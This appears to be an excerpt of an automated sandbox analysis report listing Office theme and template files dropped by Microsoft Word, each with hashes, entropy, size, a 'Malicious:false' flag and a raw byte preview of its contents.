                                                                                                                                                                                                                                                                                                                                                                          SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):966946
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8785200658952
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                                                                                                                                                                                                                                                          MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):282
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5323495192404475
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1463634
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.898382456989258
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                                                                                                                                                                                                                                                          MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):280
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5286004619027067
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1091485
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.906659368807194
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                                                                                                                                                                                                                                                          MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):280
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5301133500353727
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                                                                                                                                                                                                                                                                                                                                          SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1750795
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.892395931401988
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                                                                                                                                                                                                                                                          MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):280
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.528155916440219
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                                                                                                                                                                                                                                                                                                                                          SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2218943
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.942378408801199
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                                                                                                                                                                                                                                                          MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):278
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.544065206514744
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2357051
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.929430745829162
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                                                                                                                                                                                                                                                          MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):276
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.516423078177173
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:5402138088A9CF0993C08A0CA81287B8
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3078052
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.954129852655753
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                                                                                                                                                                                                                                                          MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
